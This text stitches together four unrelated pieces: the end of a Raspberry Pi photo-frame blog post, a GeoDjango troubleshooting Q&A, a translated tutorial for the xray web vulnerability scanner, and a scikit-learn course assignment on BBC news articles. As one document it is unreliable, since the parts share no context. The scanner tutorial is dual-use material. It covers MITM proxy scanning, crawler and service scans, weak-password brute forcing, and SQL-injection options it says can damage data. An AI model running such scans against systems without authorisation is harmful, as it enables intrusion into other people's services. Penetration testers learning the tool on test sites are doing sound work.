Indeed you can. I know because I just did it. You enable your Pi for ssh access, then do the rclone config (or whatever it's called) using putty from a Windows 10 system. You'll get a long Google URL in the course of configuring that you can paste into your browser. You verify it's you, log into your Google account. Then you get back a url like http://127.0.0.1:5462/another-long-url-string. Well, put that url into your clipboard and in another login window, enter curl clipboard_contents
That’s what I did, not certain it would work, but I saw it go through in my rclone-config window, and that was that!
Don’t want to deal with rclone?
So you want to use a traditional flash drive you plug in to a USB port, just like you have for the commercial photo frames, but you otherwise like my approach of randomizing the picture selection each day? I'm sure that is possible. A mid-level linux person could rip out the rclone stuff I have embedded and replace it as needed with filesystem commands. I'm imagining a colossal flash drive with all your tens of thousands of pictures on it where my random selection still adds value. If this post becomes popular enough perhaps I will post exactly how to do it.
Getting started with this
After you’ve done all that, and want to try it out. you can run
$ ./master.sh
First you should see a file called files growing in size – that's rclone doing its listing. That takes a few minutes. Then it generates random numbers for photo selection – that's very fast, maybe a second. Then it slowly copies over the selected images to a temporary folder called Picturestmp. That's the slowest part. If you do a directory listing you should see the number of images in that directory growing slowly, adding maybe three per minute until it reaches 60 of them. Finally the rotations are applied. But even if you didn't set up your python environment correctly, it doesn't crash. It effectively skips the rotations. A rotation takes a couple seconds per image. Finally all the images are copied over to the production area, the directory called Pictures; the old slideshow program is "killed," and the new slideshow starts up. The whole process takes around 15 minutes.
I highly recommend running master.sh by hand as just described to make sure it all works. Probably some of it won’t. I don’t specialize in making recipes, more just guidance. But if you’re feeling really bold you can just power it up and wait a day (because initially you won’t have any pictures in your slideshow) and pray that it all works.
Still missing
I’d like to display a transition image when switching from the current set of photos to the new ones.
Suppressing boot up messages might be nice for some. Personally I think they’re kind of cool – makes it look like you’ve done a lot more techie work than you actually have!
You're going to get some junk images. I've seen where an image is a thumbnail (I guess) and gets blown up full screen so that you see these giant blocks of pixels. I could perhaps magnify those kinds of images less.
Movies are going to be tricky so let’s not even go there…
I was thinking about making it a navigation-enabled photo frame, such as integration with a Gameboy controller. You could do some really awesome stuff: Pause this picture; display the location (town or city) where this photo was taken; refresh the slideshow. It sounds fantastical, but I don’t think it’s beyond the capability of even modestly capable hobbyist programmers such as myself.
I may still spin the frame 90 degrees this way and that. I have the servo mounted and ready. Just got to revive the control commands for it.
References and related
This 7″ display is a little small, but it’s great to get you started. It’s $64 at Amazon: Amazon.com: Raspberry Pi 7″ Touch Screen Display: Electronics
I have an older approach using qiv which I lost the files for, and my blog post got corrupted. Hence this new approach.
My advanced slideshow treatment is beginning to take shape. I just add to it while I develop it, so check it periodically if that is of interest. Raspberry Pi advanced photo frame.
|
Django v1.11.5
I'm trying to install GeoDjango to play around with Google Maps.
I installed the PostgreSQL app for Mac and ran pip install psycopg2. I also used Homebrew to install GDAL.
I edited settings.py to add:
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'djangodb',
        'USER': 'admin',
        'PASSWORD': '',
        'HOST': 'localhost',
        'PORT': '5432',
    }
}
However, when I run python manage.py I get: AttributeError: 'DatabaseOperations' object has no attribute 'geo_db_type'
I assigned the database to the user using: CREATE DATABASE djangodb OWNER admin;
Full error:
Running migrations: Applying usuarios.Ubicación_1111 …
Traceback (most recent call last):
  File "manage.py", line 22, in <module>
    execute_from_command_line(sys.argv)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/core/management/__init__.py", line 364, in execute_from_command_line
    utility.execute()
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/core/management/__init__.py", line 356, in execute
    self.fetch_command(subcommand).run_from_argv(self.argv)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/core/management/base.py", line 283, in run_from_argv
    self.execute(*args, **cmd_options)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/core/management/base.py", line 330, in execute
    output = self.handle(*args, **options)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/core/management/commands/migrate.py", line 204, in handle
    fake_initial=fake_initial,
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/db/migrations/executor.py", line 115, in migrate
    state = self._migrate_all_forwards(state, plan, full_plan, fake=fake, fake_initial=fake_initial)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/db/migrations/executor.py", line 145, in _migrate_all_forwards
    state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/db/migrations/executor.py", line 244, in apply_migration
    state = migration.apply(state, schema_editor)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/db/migrations/migration.py", line 129, in apply
    operation.database_forwards(self.app_label, schema_editor, old_state, project_state)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/db/migrations/operations/models.py", line 97, in database_forwards
    schema_editor.create_model(model)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/db/backends/base/schema.py", line 254, in create_model
    definition, extra_params = self.column_sql(model, field)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/db/backends/base/schema.py", line 144, in column_sql
    db_params = field.db_parameters(connection=self.connection)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/db/models/fields/__init__.py", line 662, in db_parameters
    type_string = self.db_type(connection)
  File "/Applications/Anaconda/anaconda/envs/DjangoEnv/lib/python3.6/site-packages/django/contrib/gis/db/models/fields.py", line 126, in db_type
    return connection.ops.geo_db_type(self)
AttributeError: 'DatabaseOperations' object has no attribute 'geo_db_type'
Similar questions I tried: Getting 'DatabaseOperations' object has no attribute 'geo_db_type' error when doing a syncdb
You must change the DATABASES setting to use the postgis backend,
'ENGINE': 'django.contrib.gis.db.backends.postgis',
and add 'django.contrib.gis' to INSTALLED_APPS.
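For illustration only, reusing the names from the question, this is where those two changes would sit in settings.py (not a complete configuration):
# settings.py (sketch, names reused from the question)
INSTALLED_APPS = [
    # ... your existing apps ...
    'django.contrib.gis',
]

DATABASES = {
    'default': {
        'ENGINE': 'django.contrib.gis.db.backends.postgis',  # GeoDjango backend
        'NAME': 'djangodb',
        'USER': 'admin',
        'PASSWORD': '',
        'HOST': 'localhost',
        'PORT': '5432',
    }
}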
|
Original article:
Chaitin Tech's xray scanner works quite well and is well regarded in China. I was lucky enough to have worked at Chaitin Tech before, and the technical atmosphere there was great. But I digress. This article is Guoguang's study notes on xray; it can also serve as a beginner's xray tutorial, though I still recommend reading the official documentation. It's just that lately I have grown fond of this kind of study log, and it makes learning very efficient.
Introduction
A well-rounded security assessment tool developed by Chaitin Tech. It supports scanning for common web security issues as well as custom POCs. Although there is a project on GitHub, it is not open source; only a community edition is provided for everyone to use.
Basic usage
Proxy mode
In proxy mode the basic architecture is: the scanner acts as a man-in-the-middle. It first forwards traffic unchanged and returns the server's response to the browser or other client, so both ends of the communication believe they are talking directly to each other; at the same time it records that traffic, then modifies parameters and re-sends the requests to perform the scan. This is the same principle as the vulnerability scanner built into Burp Suite.
Generating a CA certificate
Bash
# Generate the CA certificate
➜ ./xray genca
# ca.crt and ca.key are generated in the current folder
➜ ls
ca.crt ca.key config.yaml xray
Import the generated CA certificate into any device whose traffic you want to proxy; this makes it easy to proxy HTTPS traffic.
Enabling the proxy
After running xray for the first time, a config.yaml configuration file is generated in the current directory. Open it in a text editor and modify it as described below. Locate the following content and change * to testphp.vulnweb.com, which is AWVS's official test site and convenient for checking the scanner's capabilities. Yaml
# See https://chaitin.github.io/xray/#/configration/mitm for an explanation of the configuration
mitm:
...
restriction:
includes: # domains allowed to be scanned, no protocol here
- 'testphp.vulnweb.com' # '*' means all domains and paths are allowed
...
Listen on local port 7777 and set the vulnerability report output file name to xray-testphp.html. Bash
➜ ./xray webscan --listen 127.0.0.1:7777 --html-output xray-testphp.html
Configuring the proxy
The SwitchyOmega extension for Chrome makes it very convenient to add all kinds of proxies. Add xray's proxy there, then enable the xray proxy in the browser:
Starting the scan
Use the Chrome browser you just configured with the proxy to visit: http://testphp.vulnweb.com
You can then watch the xray console start printing vulnerability information. As the user interacts with the site, xray runs security checks on the links visited along the way and generates the corresponding vulnerability report:
Below are a few quick links you can click to try scanning for more vulnerability types:
http://testphp.vulnweb.com/listproducts.php?cat=1
http://testphp.vulnweb.com/artists.php?artist=2
http://testphp.vulnweb.com/redir.php?r=http://www.w3.org
You can see the corresponding vulnerability detection report in the output format configured above: wow awesome
Crawler mode
Crawler mode simulates a human clicking through the links of web pages and then analyzes and scans them. Unlike proxy mode, the crawler needs no human involvement and visits pages much faster, but there are some drawbacks to be aware of:
xray's basic crawler cannot handle pages rendered by JavaScript
You must first manually configure login cookies, required HTTP headers, and so on; if login fails, the problem is not easy to notice
Bash
➜ ./xray webscan --basic-crawler http://testphp.vulnweb.com/ --html-output xray-crawler-testphp.html
In this mode it is effectively an active scan: xray analyzes the links on pages by itself and then automatically probes them for vulnerabilities.
Service scanning
xray also supports service scanning. There are not many service-scan POCs yet; currently there is only one, a tomcat-cve-2020-1938 AJP protocol arbitrary file read detection POC.
The parameter options are fairly simple at the moment, supporting single-target and batch scans: Bash
# Quickly check a single target
➜ ./xray servicescan --target 127.0.0.1:8009
# Batch-check the targets in test.file, one target per line, with port
➜ ./xray servicescan --target-file test.file
The format of test.file is one service per line, for example:
10.3.0.203:8009
127.0.0.1:8009
The results can also be written to a report; multiple formats are supported: Bash
# Output the detection results to an HTML report
➜ ./xray servicescan --target 127.0.0.1:8009 --html-output service.html
➜ ./xray servicescan --target-file test.file --html-output service.html
# Output the detection results to a JSON file
➜ ./xray servicescan --target 127.0.0.1:8099 --json-output service.json
The full servicescan usage can be viewed with the following command: Shell
➜ ./xray servicescan --help
NAME:
servicescan - Run a service scan task
USAGE:
servicescan [command options] [arguments...]
OPTIONS:
--target value specify the target, for example: host:8009
--target-file value load targets from a local file, one target a line
--json-output FILE output xray results to FILE in json format
--webhook-output value post xray result to url in json format
--html-output FILE output xray result to FILE in HTML format
After deployment, use xray to run a scan and see how well it works:
Configuration
Command reference
Looking at -h, those of us who work in security should find it all pretty easy to understand: Shell
➜ ./xray -h
USAGE:
[global options] command [command options] [arguments...]
COMMANDS:
webscan Run a webscan task
servicescan Run a service scan task
poclint lint yaml poc
reverse Run a standalone reverse server
genca Generate CA certificate and key
upgrade check new version and upgrade self if any updates found
version Show version info
help, h Shows a list of commands or help for one command
GLOBAL OPTIONS:
--config FILE Load configuration from FILE
--log_level value Log level, choices are debug, info, warn, error, fatal
--help, -h show help
GLOBAL OPTIONS
Global options. If specified here, they take effect for every command that is run. Bash
# Specifies the location of the configuration file; by default config.yaml in the same directory is loaded
--config FILE Load configuration from FILE
# Specifies the global log level; default is info, can be set to debug for more detail
--log_level value Log level, choices are debug, info, warn, error, fatal
--help, -h show help
Global options must immediately follow the binary, for example: Bash
# Correct usage
➜ ./xray --log_level debug --config my.yaml webscan --url xxx
# Wrong usage: the global options do not immediately follow the binary
➜ ./xray webscan --log_level debug --config my.yaml --url xxx
COMMANDS
Command  Description
webscan  xray's core feature, used to discover and probe web vulnerabilities
servicescan  Service scanning, used to probe service-level vulnerabilities
poclint  Check whether a PoC conforms to the specification
reverse  Start a standalone blind-callback (reverse/OOB) platform server
genca  Quickly generate a root certificate, mainly used when passively proxying HTTPS traffic
upgrade  Check for new versions and upgrade automatically if one is found
version  Show version info
help  Show the command list or help for one command
subdomain  Subdomain scanning — only available in the advanced edition
subdomain
Scan example.com and write the results to example.txt Bash
➜ ./xray subdomain --target example.com --text-output example.txt
Scan example.com using the interactive console UI, while also recording the results to example.txt Bash
➜ ./xray subdomain --target example.com --console-ui --text-output example.txt
webscan
Run ./xray webscan -h and you will see: Bash
➜ xray ./xray webscan -h
NAME:
webscan - Run a webscan task
USAGE:
webscan [command options] [arguments...]
OPTIONS:
--plugins value specify the plugins to run, separated by ','
--poc value specify the poc to run, separated by ','
--listen value use proxy resource collector, value is proxy addr
--basic-crawler value use a basic spider to crawl the target and scan the results
--url-file FILE read urls from a local file and scan these urls
--url value scan a **single** url
--data value data string to be sent through POST (e.g. 'username=admin')
--raw-request FILE load http raw request from a FILE
--json-output FILE output xray results to FILE in json format
--html-output FILE output xray result to FILE in HTML format
--webhook-output value post xray result to url in json format
Scan plugins
--plugins: specify the plugins to run, separated by commas
Shell
--plugins xss
--plugins xss,sqldet,phantasm
--poc: configure which PoCs are enabled for this scan, separated by commas
Bash
# Load a single PoC, matched exactly
--plugins phantasm --poc poc-yaml-thinkphp5-controller-rce
# Load all built-in PoCs whose names contain `thinkphp`
--plugins phantasm --poc "*thinkphp*"
# Load all PoCs from the local directory `/home/test/pocs/`:
--plugins phantasm --poc "/home/test/pocs/*"
# Load the PoCs under `/home/test/pocs/` whose names contain thinkphp
--plugins phantasm --poc "/home/test/pocs/*thinkphp*"
This parameter supports glob expressions for bulk loading, so the rules are quite flexible.
Input sources
--listen: start a passive proxy server as the input source, e.g. --listen 127.0.0.1:7777
--basic-crawler: enable a basic crawler as the input source, e.g. --basic-crawler http://example.com
--url-file: read URLs in bulk from a file
--url: quickly test a single URL, without crawling; GET request by default
--data: specify POST data, which also switches the request to POST
--raw-request: load a raw HTTP request from a file and use it for scanning, similar to sqlmap -r
Output formats
--json-output: write results to a JSON file as structured data
--html-output: write results to an HTML report
--webhook-output: POST results as structured JSON to a URL; you need to run your own web server to receive the vulnerability information xray sends
You can use the variables __timestamp__ and __datetime__ in the --json-output and --html-output parameters; the corresponding position in the filename is replaced automatically with a timestamp or date-time, which avoids errors when several runs would otherwise write to the same file. For example, --html-output report-__datetime__.html will use report-2019_11_01-10_03_26.html as the report filename.
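For instance, combining this with the flags already described above (the URL and filenames here are only placeholders): Bash
➜ ./xray webscan --url http://example.com --html-output report-__datetime__.html --json-output report-__timestamp__.json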
Combined usage
Combining the options above covers the needs of many different scenarios: Bash
# Use the xss plugin, start a proxy server on port 1111 for web vulnerability scanning, and write the report to 1.html
➜ ./xray webscan --plugins xss --listen 127.0.0.1:1111 --html-output 1.html
# Set the log level to debug, use the xss and command-injection plugins, scan with the built-in crawler, and write the report to 1.json
➜ ./xray --log_level debug webscan --plugins xss,cmd_injection --basic-crawler http://example.com --json-output 1.json
# Run POST-based detection against the target with data x=y, writing reports to 2.html and 1.json
➜ ./xray webscan --url http://example.com --data "x=y" --html-output 2.html --json-output 1.json
# Scan a single URL on the target and send the vulnerability report to the specified receiving server
➜ ./xray webscan --url http://example.com/ --webhook-output http://host:port/path
...
Interactive command line
The interactive command line is a nice perk for newcomers: it offers command auto-completion hints. Just run xray without any arguments to start it.
Configuration file
The first time the engine runs, it generates a config.yaml file in the current directory. By tuning the parameters in this configuration you can cover many different scenarios.
While xray is iterating quickly, the configuration file is not guaranteed to be backward compatible. If something breaks, back up the config file and regenerate it. In fact it is advisable to back up, delete, and regenerate the config file after every version upgrade so you don't miss the settings for new features.
Plugin configuration
Before the individual plugin settings, the plugins section has a top-level option max_parallel, the plugin concurrency. For example, if 3 requests need processing and the three plugins sqldet, xss, and cmd_injection are enabled, with max_parallel set to 1 the processing looks like: Powershell
sqldet, xss, cmd_injection process request1 together
sqldet, xss, cmd_injection process request2 together
sqldet, xss, cmd_injection process request3 together
When max_parallel is set to 3, the processing becomes: Shell
sqldet, xss, cmd_injection process request1, request2, request3 concurrently (3-way concurrency)
In theory this cuts the time by a factor of 3, but bigger is not always better: higher concurrency means far more packets in flight at the same time, which can affect the remote server and xray's judgment of vulnerabilities, so set it as needed.
For the remaining options, each plugin is one configuration unit, and each unit has the basic format: Yaml
pluginName:
  enabled: true/false
  otherConfigurations: xxx
enabled toggles the plugin, so below only the special options of some plugins are described.
xss
ie_feature — if true, vulnerabilities that can only be reproduced in an IE environment are also reported; beginners should leave this off.
include_cookie — if true, also check for XSS where the input source is in a cookie.
baseline
detect_outdated_ssl_version — whether to detect outdated SSL/TLS versions; if the target still enables TLS 1.1, TLS 1.0, or SSL 3.0, a vulnerability is reported.
detect_http_header_config — whether to check HTTP header configuration, mainly whether security-related headers are missing or misconfigured.
detect_cors_header_config — whether to check CORS-related issues.
detect_server_error_page — check whether a response is an error page; error messages of mainstream frameworks are recognized.
detect_china_id_card_number — check whether a response contains Chinese ID card numbers.
detect_serialization_data_in_params — check whether parameters contain serialized data; Java, PHP, and Python are supported.
detect_cookie_password_leak — detect password leaks in cookies.
detect_unsafe_scheme — detect insecure schemes.
detect_cookie_httponly — detect whether cookies set HttpOnly.
cmd_injection
detect_blind_injection — whether to use blind (out-of-band) techniques to check for command injection.
dirscan
dictionary — path to the directory-scan (web) dictionary; must be an absolute path.
sqldet
error_based_detection — enable error-based injection detection.
boolean_based_detection — enable boolean-based blind injection detection.
time_based_detection — enable time-based blind injection detection.
The next two options are dangerous: enabling them can improve detection, but they may corrupt data in the database — be sure you understand how they work before turning them on.
dangerously_use_comment_in_sql — allow comments to be used when testing for injection.
dangerously_use_or_in_sql — allow OR to be used when testing for injection.
brute_force
detect_default_password — detect default passwords.
detect_unsafe_login_method — detect insecure login methods.
username_dictionary — weak-password username dictionary; absolute path required.
password_dictionary — weak-password password dictionary; absolute path required.
If none is configured, the built-in dictionaries are used (roughly the top 8 usernames and top 80 passwords). If configured, your dictionary is merged with the built-in one and deduplicated.
phantasm
depth — probe depth, default 1, i.e. the plugin only runs at URL depth 0 and depth 1 (provided the plugin is enabled).
poc — define which PoCs are enabled by default. Both built-in PoC names and absolute paths to local files are supported, e.g.:
Yaml
phantasm:
poc:
- poc-yaml-activemq-cve-2016-3088
- /Users/test/1.yml
This makes it easy to add your own PoCs.
Passive proxy configuration
This part covers the mitm section of the configuration.
Capturing HTTPS traffic
This corresponds to the ca_cert and ca_key options.
As with Burp, capturing HTTPS traffic requires trusting a root certificate. You can generate one yourself, or use the built-in command below: Bash
➜ ./xray genca
After running it, ca.key and ca.crt are generated in the current directory. Import the certificate manually, just like importing Burp's certificate.
Firefox needs the certificate imported separately in the browser. On mobile, set the proxy and then visit http://xray/ to download the root certificate.
Password-protecting the proxy
This corresponds to the auth settings.
xray supports basic authentication for the proxy. Once username and password are set under auth, the browser pops up a credentials prompt when the proxy is used, and the proxy only works after they are entered correctly.
Restricting the scan scope
The restriction item in the mitm configuration limits which URIs are scanned.
includes — which domains and paths may be scanned. For example, *.example.com scans only subdomains of example.com.
excludes — which domains and paths are not scanned. For example, t.example.com means t.example.com is not scanned.
If both are configured, the intersection is taken. These two settings are commonly used when you want to filter certain domains out of the proxied traffic, or only scan requests for one domain.
Both settings support path filtering: if the value contains a /, everything after the / is a path filter. The examples below illustrate this: Yaml
includes:
- 'example.com/test' # allows only the single path example.com/test
- "example.com/admin*" # allows every path under example.com that starts with /admin
Note: neither includes nor excludes supports port numbers — adding one makes the restriction ineffective!
Setting the proxy IP whitelist
The allow_ip_range option restricts which IPs may use the proxy. Single IPs and CIDR addresses are supported, e.g.: Yaml
allow_ip_range: ["127.0.0.1","192.168.1.1/24"]
Leaving it empty allows all addresses. If the source IP is not within the configured ranges, the client gets a Proxy Failed error.
Queue length configuration
Yaml
queue:
  max_length: 10000
This is the classic producer/consumer problem: when production and consumption speeds don't match, an intermediate queue is needed for temporary storage, and its size is max_length. If max_length is set too large, xray's memory usage grows and the process may even run out of memory and crash (OOM).
Proxy request header configuration
Yaml
proxy_header:
via: ""             # if non-empty, the proxy adds an HTTP header like Via: 1.1 some-value-random
x_forwarded: false  # whether to add the four X-Forwarded-{For,Host,Proto,Url} HTTP headers
If proxy_header is enabled, the proxy adds the Via header and the X-Forwarded-* family. If a header with the same name already exists in the request, the value is appended to it.
For example, with curl http://127.0.0.1:1234 -H "Via: test" -H "X-Forwarded-For: 1.2.3.4" -v, the backend actually receives: Http
GET / HTTP/1.1
Host: 127.0.0.1:1234
User-Agent: curl/7.54.0
Accept: */*
Via: test, 1.1 xray-1fe7f9e5241b2b150f32
X-Forwarded-For: 1.2.3.4, 127.0.0.1
X-Forwarded-Host: 127.0.0.1:1234
X-Forwarded-Proto: http
X-Forwarded-Url: http://127.0.0.1:1234/
Accept-Encoding: gzip
Proxying through an upstream proxy
Suppose xray is started with listen set to 127.0.0.1:1111 and upstream_proxy set to http://127.0.0.1:8080, and the browser's proxy is set to http://127.0.0.1:1111; the overall data flow is then:
This setting only affects the proxy itself; it does not affect how plugins send packets during vulnerability detection.
Blind-callback (OOB) platform configuration
There is a lot of ground here and many reverse/OOB platforms exist; if you are interested in this xray feature, see the official xray documentation — it is not covered in detail here.
HTTP configuration
For web scanning, HTTP interaction is the core of the whole detection process, so these settings affect how the engine sends HTTP requests.
Proxy used for vulnerability scanning: proxy
Once configured, scan requests are sent through this proxy. http, https, and socks5 are supported, e.g.:
http://127.0.0.1:1111
https://127.0.0.1:1111
socks5://127.0.0.1:1080
Basic crawler configuration
The basic crawler options live in the basic-crawler section. The defaults are shown below; see the comments in the file for usage: Yaml
basic_crawler:
max_depth: 0 # maximum crawl depth, 0 = unlimited
max_count_of_links: 0 # maximum number of links crawled in this scan, 0 = unlimited
allow_visit_parent_path: false # whether to allow visiting the parent directory; if the scan target is example.com/a/ and this is false, example.com/ will not be crawled
restriction: # same syntax as in mitm; note that if the current target is example.com, example.com is automatically added to includes
includes: []
excludes:
- '*google*'
Subdomain configuration
Note: this feature is only available in the advanced edition.
I tested the subdomain feature: it works, but it is not very powerful — collecting domains yourself from multiple sources gives more complete results. See the official docs if you are interested.
Update check configuration
xray has a simple built-in update check: on every start it checks whether a new version has been released, and if so the latest release notes are shown in the UI. If you don't want this, it can be disabled as follows:
Add the following to config.yaml to disable the update check: Yaml
update:
check: false
Advanced xray usage
Using xray with Burp Suite
First have xray start its webscan listener: Bash
➜ ./xray webscan --listen 127.0.0.1:7777 --html-output bp.html
In Burp, open the User options tab and find the Upstream Proxy Servers setting.
Click Add to add an upstream proxy and its scope. In Destination host you can use * to match any string and ? to match a single character; for the upstream proxy address, enter xray's listen address.
Burp's SOCKS proxy conflicts with the upstream proxy servers — they cannot be enabled at the same time.
Burp then intercepts traffic as usual, and at the same time forwards the captured traffic to xray for vulnerability detection.
Using xray with AWVS
First have xray start its webscan listener.
If your AWVS is not installed on the physical machine, xray should listen on an address that AWVS can reach — in my tests, listening on 127.0.0.1 could not be linked up with AWVS.
Bash
➜ ./xray webscan --listen 192.168.31.53:7777 --html-output awvs.html
Using AWVS 13 as an example, log into the management page, click Targets, then Add Target to add a scan target:
The demo here scans AWVS's online test site http://testphp.vulnweb.com/
Scroll down to the HTTP section and fill in Proxy Server with the corresponding xray proxy. Because my AWVS runs in a virtual machine, I entered my physical machine's IP address here (I carelessly used 127.0.0.1 earlier and nothing happened). I never managed to get the Docker version of AWVS linked up with xray.
Finally, choose "Crawl only" as the scan type:
AWVS's crawler then forwards every request to xray for vulnerability detection, and the findings land neatly in awvs.html:
Calling xray from Django
Newer versions of xray support webhooks, which makes it easy to integrate from code. First, xray listens on port 7777 and performs vulnerability detection on the proxied traffic, while sending the vulnerability information via webhook to http://127.0.0.1:8000/scan/xray/ Bash
➜ ./xray webscan --listen 192.168.31.53:7777 --webhook-output http://127.0.0.1:8000/scan/xray/
http://127.0.0.1:8000/scan/xray/ is an endpoint I wrote with Django; a minimal implementation of it follows: Python
import json

from django.shortcuts import render
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.views.generic.base import View


class WebHook(View):
    # On a class-based view, csrf_exempt has to be applied through method_decorator
    @method_decorator(csrf_exempt)
    def dispatch(self, request, *args, **kwargs):
        return super().dispatch(request, *args, **kwargs)

    def post(self, request):
        vul_data = json.loads(request.body)       # xray posts each finding as JSON
        if 'detail' in str(request.body):         # vulnerability events carry a 'detail' field
            print('Plugin:', vul_data['plugin'])
            print('URL:', vul_data['target']['url'])
            print('Vulnerability class:', vul_data['vuln_class'])
        return render(request, 'test.html', {})
Because of Django's CSRF protection, xray's POST requests to Django would normally need a CSRF token; the workaround is to disable CSRF checking on this view's dispatch method:
@csrf_exempt
References
Source: 国光
Author: 国光
Original article: https://www.sqlsec.com/2020/04/xray.html
|
Assignment 6
This assignment is designed to develop your ability to process data sets, use scikit-learn models, and analyze their output. You will do this by classifying, clustering, and analyzing news articles from the BBC.
This will demonstrate the following skills:
Multi-class (more than 2 classes) classification using naïve Bayes and k-nearest neighbors classifiers
Clustering with the k-means algorithm
SciKit pipelines
Dimensionality reduction with SVD and NMF
This assignment is due midnight, November 22, 2020. Upload your solution notebook and PDF export to Blackboard.
Revision Log
November 21, 2020
Correct missing make_scorer call in GridSearchCV snippet.
November 17, 2020
Added encoding to reading files
Fixed typo in SVD example code
Added note about removing stop words
November 16, 2020
Fixed typo in MultinomialNB code.
SciKit-Learn Classes
There are two different text vectorizers you will need to use: CountVectorizer and TfidfVectorizer.
You can also use CountVectorizer with TfidfTransformer to get the same result as TfidfVectorizer.
I recommend using the vectorizer in a pipeline with your other learning class(es).
You will need to use the following classifiers and models:
MultinomialNB, the naïve Bayes classifier.
KNeighborsClassifier, the k-nearest neighbors classifier.
KMeans, the k-means clustering algorithm.
TruncatedSVD, the dimensionality reduction algorithm.
Load and Prepare Data (20%)
Download the Raw text files for the main ‘BBC’ data set from http://mlg.ucd.ie/datasets/bbc.html. This will be a Zip file that contains text files with data.
You can read the files into a Pandas data frame with the following code:
from pathlib import Path
import pandas as pd

articles = pd.DataFrame.from_records(
    ((f.parent.name, f.name, f.read_text(encoding='latin1'))
     for f in Path('bbc').glob('*/*.txt')),
    columns=['category', 'file', 'text']
)
This loops over all text files and reads them into records, that you then turn into a Pandas data frame.
Set aside 20% of the data for testing your classifiers.
Show the distribution of categories - how many articles are there in each category? Do this with a suitable plot.
Classification (25%)
Train a naïve Bayes classifier (MultinomialNB) to predict an article's category using its term counts. Report its accuracy on both the training and the test data.
Tip
You can do this in one shot with a pipeline consisting of a CountVectorizer followed by a MultinomialNB:
bayes_pipe = Pipeline([
    ('word_count', CountVectorizer()),
    ('classify', MultinomialNB())
])
bayes_pipe.fit(train['text'], train['category'])
Train a k-NN classifier (KNeighborsClassifier) with 5 neighbors on TF-IDF term vectors. Report its accuracy on both the training and the test data. You can do this with a pipeline.
Remember LogisticRegressionCV that used cross-validation on the training data to select regularization parameters? GridSearchCV lets us do that for any parameters of any model. For example:
GridSearchCV(KNeighborsClassifier(), {
    'n_neighbors': [1, 2, 3, 5, 7, 10]
}, scoring=make_scorer(accuracy_score))
This will select the n_neighbors with the highest cross-validation accuracy on the training data.
Train a k-NN classifier with GridSearchCV to pick the neighborhood size. Report its accuracy on both the training and test data. Does tuning the neighborhood size result in better test accuracy?
Note
Should you remove stop words? Are stop words useful for this classification task?
Dimensionality Reduction (15%)
We can also search for neighbors in a vector space with reduced dimension, using either TruncatedSVD (to compute a singular value decomposition) or NMF (to compute a non-negative matrix factorization).
You can use TruncatedSVD in a pipeline, either as the last step (so you need to call transform(X) on the pipeline instead of predict), or in between your vectorizer and your classifier. The transform(X) method will return a matrix where the rows correspond to your data points, and the columns correspond to your reduced-dimension features. So, if you want to get some reduced-dimension representations of texts, you can do:
svd_pipe = Pipeline([
    ('word_vec', TfidfVectorizer()),
    ('svd', TruncatedSVD(8))
])
svd_pipe.fit(train['text'])
text_vectors = svd_pipe.transform(train['text'])
Plot a Seaborn pairplot of the results of projecting the article texts with an 8-dimensional SVD, with the points colored by document class. What do you observe?
Train a k-NN classifier with 5 neighbors on the SVD-transformed article texts. You can do this with a 3-stage pipeline. Report its accuracy on both the training and the test data.
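One possible shape for that pipeline (a sketch only — the step names are arbitrary, and train/test are assumed to be the split produced in the data-prep step):
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.decomposition import TruncatedSVD
from sklearn.neighbors import KNeighborsClassifier

svd_knn_pipe = Pipeline([
    ('word_vec', TfidfVectorizer()),              # text -> TF-IDF vectors
    ('svd', TruncatedSVD(8)),                     # reduce to 8 dimensions
    ('knn', KNeighborsClassifier(n_neighbors=5))  # classify in the reduced space
])
svd_knn_pipe.fit(train['text'], train['category'])
svd_knn_pipe.score(test['text'], test['category'])   # test-set accuracy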
Summarizing Classifier Accuracy (10%)
At this point, you should have 4 different classifiers.
Show the accuracy of your 4 different classifiers on both the training and test data with an appropriate table and plot. Which classifier design performs the best? Which classifier seems to overfit the most in the training process?
Clustering (20%)
So far our machine learning has been supervised: we have the labels. We can also do unsupervised learning, where we learn patterns from the data without labels. One such technique is clustering: putting objects (such as documents) into groups, using only the features in the documents and not using external group labels.
K-means is a simple way of clustering a group of data points into k clusters. KMeans in scikit-learn implements this; after training, its predict() method outputs cluster numbers for data points - this is how you will get the clusters. It's like the classifier output, except cluster numbers. The most important parameter to KMeans is the number of clusters to find - it cannot do that on its own. It also does not match clusters to classes.
Our goal in this part is to answer the question: if we automatically cluster the news articles, do the clusters match their editor-defined categories?
We are going to explore this by showing the distribution of document categories within each cluster. The resulting chart should be a faceted bar chart: one bar plot for each cluster, in which the x axis is the article category, and the y axis is the number of documents in that cluster that are in that category.
Fit a k-means model with 5 clusters, using TF-IDF vectors, and plot the cluster/category alignment as described above. Do you think the clustering did a good job of finding the categories?
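A sketch of one way to fit that model, assuming the same train frame as above:
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans

cluster_pipe = Pipeline([
    ('word_vec', TfidfVectorizer()),
    ('cluster', KMeans(n_clusters=5))
])
cluster_pipe.fit(train['text'])
clusters = cluster_pipe.predict(train['text'])   # cluster number for each article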
